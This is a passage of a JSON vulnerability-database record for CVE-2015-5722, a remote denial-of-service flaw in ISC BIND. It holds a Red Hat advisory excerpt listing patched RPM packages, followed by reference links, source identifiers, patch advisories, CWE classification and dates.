6):\n\ni386:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.i686.rpm\n\nppc64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.ppc.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.ppc64.rpm\n\ns390x:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.s390.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.s390x.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nbind-9.8.2-0.37.rc1.el6_7.4.src.rpm\n\ni386:\nbind-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.i686.rpm\n\nx86_64:\nbind-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.i686.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.4.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nbind-9.9.4-18.el7_1.5.src.rpm\n\nnoarch:\nbind-license-9.9.4-18.el7_1.5.noarch.rpm\n\nx86_64:\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm\nbind-utils-9.9.4-18.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbind-9.9.4-18.el7_1.5.x86_64.rpm\nbind-chroot-9.9.4-18.el7_1.5.x86_64.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nbind-9.9.4-18.el7_1.5.src.rpm\n\nnoarch:\nbind-license-9.9.4-18.el7_1.5.noarch.rpm\n\nx86_64:\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm\nbind-utils-9.9.4-18.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbind-9.9.4-18.el7_1.5.x86_64.rpm\nbind-chroot-9.9.4-18.el7_1.5.x86_64.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nbind-9.9.4-18.el7_1.5.src.rpm\n\nnoarch:\nbind-license-9.9.4-18.el7_1.5.noarch.rpm\n\nppc64:\nbind-9.9.4-18.el7_1.5.ppc64.rpm\nbind-chroot-9.9.4-18.el7_1.5.ppc64.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.ppc.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.ppc64.rpm\nbind-libs-9.9.4-18.el7_1.5.ppc.rpm\nbind-libs-9.9.4-18.el7_1.5.ppc64.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.ppc.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.ppc64.rpm\nbind-utils-9.9.4-18.el7_1.5.ppc64.rpm\n\ns390x:\nbind-9.9.4-18.el7_1.5.s390x.rpm\nbind-chroot-9.9.4-18.el7_1.5.s390x.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.s390.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.s390x.rpm\nbind-libs-9.9.4-18.el7_1.5.s390.rpm\nbind-libs-9.9.4-18.el7_1.5.s390x.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.s390.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.s390x.rpm\nbind-utils-9.9.4-18.el7_1.5.s390x.rpm\n\nx86_64:\nbind-9.9.4-18.el7_1.5.x86_64.rpm\nbind-chroot-9.9.4-18.el7_1.5.x86_64.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm\nbind-utils-9.9.4-18.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nbind-9.9.4-18.ael7b_1.5.src.rpm\n\nnoarch:\nbind-license-9.9.4-18.ael7b_1.5.noarch.rpm\n\nppc64le:\nbind-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-chroot-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-debuginfo-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-libs-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-libs-lite-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-utils-9.9.4-18.ael7b_1.5.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbind-debuginfo-9.9.4-18.el7_1.5.ppc.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.ppc64.rpm\nbind-devel-9.9.4-18.el7_1.5.ppc.rpm\nbind-devel-9.9.4-18.el7_1.5.ppc64.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.ppc.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.ppc64.rpm\nbind-sdb-9.9.4-18.el7_1.5.ppc64.rpm\nbind-sdb-chroot-9.9.4-18.el7_1.5.ppc64.rpm\n\ns390x:\nbind-debuginfo-9.9.4-18.el7_1.5.s390.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.s390x.rpm\nbind-devel-9.9.4-18.el7_1.5.s390.rpm\nbind-devel-9.9.4-18.el7_1.5.s390x.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.s390.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.s390x.rpm\nbind-sdb-9.9.4-18.el7_1.5.s390x.rpm\nbind-sdb-chroot-9.9.4-18.el7_1.5.s390x.rpm\n\nx86_64:\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64le:\nbind-debuginfo-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-devel-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-lite-devel-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-sdb-9.9.4-18.ael7b_1.5.ppc64le.rpm\nbind-sdb-chroot-9.9.4-18.ael7b_1.5.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nbind-9.9.4-18.el7_1.5.src.rpm\n\nnoarch:\nbind-license-9.9.4-18.el7_1.5.noarch.rpm\n\nx86_64:\nbind-9.9.4-18.el7_1.5.x86_64.rpm\nbind-chroot-9.9.4-18.el7_1.5.x86_64.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-9.9.4-18.el7_1.5.x86_64.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.i686.rpm\nbind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm\nbind-utils-9.9.4-18.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbind-debuginfo-9.9.4-18.el7_1.5.i686.rpm\nbind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm\nbind-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.i686.rpm\nbind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-9.9.4-18.el7_1.5.x86_64.rpm\nbind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5722\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFV58/pXlSAg2UNWIIRAqo9AKCYvGAS0XIjah0Rvz9F9cWxd/VCxwCcDkOK\n9T/pbmUk+4CypupOJP/vVmA=\n=hqc9\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. 6.6) - i386, ppc64, s390x, x86_64\n\n3. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they perform\nauthentication when making recursive queries to resolve addresses for\nservers listed in NS RRSETs", "sources": [ { "db": "NVD", "id": "CVE-2015-5722" }, { "db": "BID", "id": "76605" }, { "db": "VULHUB", "id": "VHN-83683" }, { "db": "VULMON", "id": "CVE-2015-5722" }, { "db": "PACKETSTORM", "id": "134059" }, { "db": "PACKETSTORM", "id": "134441" }, { "db": "PACKETSTORM", "id": "133411" }, { "db": "PACKETSTORM", "id": "133639" }, { "db": "PACKETSTORM", "id": "133408" }, { "db": "PACKETSTORM", "id": "135473" } ], "trust": 1.89 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-83683", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-83683" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-5722", "trust": 2.7 }, { "db": "ISC", "id": "AA-01287", "trust": 2.3 }, { "db": "BID", "id": "76605", "trust": 1.5 }, { "db": "ISC", "id": "AA-01306", "trust": 1.2 }, { "db": "ISC", "id": "AA-01438", "trust": 1.2 }, { "db": "ISC", "id": "AA-01307", "trust": 1.2 }, { "db": "ISC", "id": "AA-01305", "trust": 1.2 }, { "db": "MCAFEE", "id": "SB10134", "trust": 1.2 }, { "db": "SECTRACK", "id": "1033452", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201509-057", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "134441", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "134059", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "133411", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "133408", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "133410", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133407", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133423", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133434", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133409", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134864", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-83683", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-5722", "trust": 0.1 }, { "db": "ISC", "id": "AA-01291", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133639", "trust": 0.1 }, { "db": "ISC", "id": "AA-01317", "trust": 0.1 }, { "db": "ISC", "id": "AA-01272", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135473", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-83683" }, { "db": "VULMON", "id": "CVE-2015-5722" }, { "db": "BID", "id": "76605" }, { "db": "PACKETSTORM", "id": "134059" }, { "db": "PACKETSTORM", "id": "134441" }, { "db": "PACKETSTORM", "id": "133411" }, { "db": "PACKETSTORM", "id": "133639" }, { "db": "PACKETSTORM", "id": "133408" }, { "db": "PACKETSTORM", "id": "135473" }, { "db": "CNNVD", "id": "CNNVD-201509-057" }, { "db": "NVD", "id": "CVE-2015-5722" } ] }, "id": "VAR-201509-0003", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-83683" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T19:44:42.612000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Debian Security Advisories: DSA-3350-1 bind9 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2d4f632833a43c4eaa5805f28e3b91fe" }, { "title": "Ubuntu Security Notice: bind9 vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2728-1" }, { "title": "Amazon Linux AMI: ALAS-2015-594", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-594" }, { "title": "Apple: OS X Server 5.0.15", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=e4f689e38c48c81fbfd32d7313793956" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=8b701aba68029ec36b631a8e26157a22" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce" }, { "title": "afl-cve", "trust": 0.1, "url": "https://github.com/mrash/afl-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5722" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-83683" }, { "db": "NVD", "id": "CVE-2015-5722" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.9, "url": "https://kb.isc.org/article/aa-01287" }, { "trust": 1.6, "url": "http://rhn.redhat.com/errata/rhsa-2015-1705.html" }, { "trust": 1.5, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html" }, { "trust": 1.5, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2015-1706.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2015-1707.html" }, { "trust": 1.3, "url": "http://www.securityfocus.com/bid/76605" }, { "trust": 1.3, "url": "http://rhn.redhat.com/errata/rhsa-2016-0079.html" }, { "trust": 1.2, "url": "http://lists.apple.com/archives/security-announce/2015/oct/msg00009.html" }, { "trust": 1.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04891218" }, { "trust": 1.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04923105" }, { "trust": 1.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04952480" }, { "trust": 1.2, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05095918" }, { "trust": 1.2, "url": "https://kb.isc.org/article/aa-01305" }, { "trust": 1.2, "url": "https://kb.isc.org/article/aa-01306" }, { "trust": 1.2, "url": "https://kb.isc.org/article/aa-01307" }, { "trust": 1.2, "url": "https://kb.isc.org/article/aa-01438" }, { "trust": 1.2, "url": "https://security.netapp.com/advisory/ntap-20190730-0001/" }, { "trust": 1.2, "url": "https://support.apple.com/ht205376" }, { "trust": 1.2, "url": "http://www.debian.org/security/2015/dsa-3350" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-september/165810.html" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-september/167465.html" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-september/165996.html" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-october/168686.html" }, { "trust": 1.2, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-september/165750.html" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201510-01" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-0078.html" }, { "trust": 1.2, "url": "http://www.securitytracker.com/id/1033452" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00005.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00006.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00012.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00033.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00020.html" }, { "trust": 1.2, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-10/msg00002.html" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2728-1" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144294073801304\u0026w=2" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10134" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5722" }, { "trust": 0.4, "url": "https://kb.isc.org/article/aa-01287/0" }, { "trust": 0.3, "url": "http://www.isc.org/products/bind/" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04952480" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04800156" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04891218" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21964962" }, { "trust": 0.3, "url": "https://www.us-cert.gov/ncas/current-activity/2015/09/16/internet-systems-consortium-isc-releases-security-updates-bind" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/6075/security-advisory-alienvault-v5-2-addresses-55-vulnerabilities" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020931" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966398" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966952" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968047" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968076" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/bind_advisory9.asc" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5986" }, { "trust": 0.2, "url": "https://www.hp.com/go/swa" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5477" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-5722" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10134" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=144294073801304\u0026amp;w=2" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://www.debian.org/security/./dsa-3350" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2728-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7031" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5986" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://kb.isc.org/article/aa-01291/0" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5722" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumbe" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5477" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8000" }, { "trust": 0.1, "url": "https://kb.isc.org/article/aa-01317" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8000" }, { "trust": 0.1, "url": "https://kb.isc.org/article/aa-01272" } ], "sources": [ { "db": "VULHUB", "id": "VHN-83683" }, { "db": "VULMON", "id": "CVE-2015-5722" }, { "db": "BID", "id": "76605" }, { "db": "PACKETSTORM", "id": "134059" }, { "db": "PACKETSTORM", "id": "134441" }, { "db": "PACKETSTORM", "id": "133411" }, { "db": "PACKETSTORM", "id": "133639" }, { "db": "PACKETSTORM", "id": "133408" }, { "db": "PACKETSTORM", "id": "135473" }, { "db": "CNNVD", "id": "CNNVD-201509-057" }, { "db": "NVD", "id": "CVE-2015-5722" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-83683" }, { "db": "VULMON", "id": "CVE-2015-5722" }, { "db": "BID", "id": "76605" }, { "db": "PACKETSTORM", "id": "134059" }, { "db": "PACKETSTORM", "id": "134441" }, { "db": "PACKETSTORM", "id": "133411" }, { "db": "PACKETSTORM", "id": "133639" }, { "db": "PACKETSTORM", "id": "133408" }, { "db": "PACKETSTORM", "id": "135473" }, { "db": "CNNVD", "id": "CNNVD-201509-057" }, { "db": "NVD", "id": "CVE-2015-5722" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-09-05T00:00:00", "db": "VULHUB", "id": "VHN-83683" }, { "date": "2015-09-05T00:00:00", "db": "VULMON", "id": "CVE-2015-5722" }, { "date": "2015-09-02T00:00:00", "db": "BID", "id": "76605" }, { "date": "2015-10-21T22:22:22", "db": "PACKETSTORM", "id": "134059" }, { "date": "2015-11-20T00:40:56", "db": "PACKETSTORM", "id": "134441" }, { "date": "2015-09-03T22:26:39", "db": "PACKETSTORM", "id": "133411" }, { "date": "2015-09-23T04:36:09", "db": "PACKETSTORM", "id": "133639" }, { "date": "2015-09-03T22:26:19", "db": "PACKETSTORM", "id": "133408" }, { "date": "2016-01-28T17:19:00", "db": "PACKETSTORM", "id": "135473" }, { "date": "2015-09-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-057" }, { "date": "2015-09-05T02:59:03.307000", "db": "NVD", "id": "CVE-2015-5722" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-12-31T00:00:00", "db": "VULHUB", "id": "VHN-83683" }, { "date": "2016-12-31T00:00:00", "db": "VULMON", "id": "CVE-2015-5722" }, { "date": "2016-07-29T17:00:00", "db": "BID", "id": "76605" }, { "date": "2015-09-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-057" }, { "date": "2016-12-31T02:59:34.047000", "db": "NVD", "id": "CVE-2015-5722" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "133408" }, { "db": "PACKETSTORM", "id": "135473" }, { "db": "CNNVD", "id": "CNNVD-201509-057" } ], "trust": 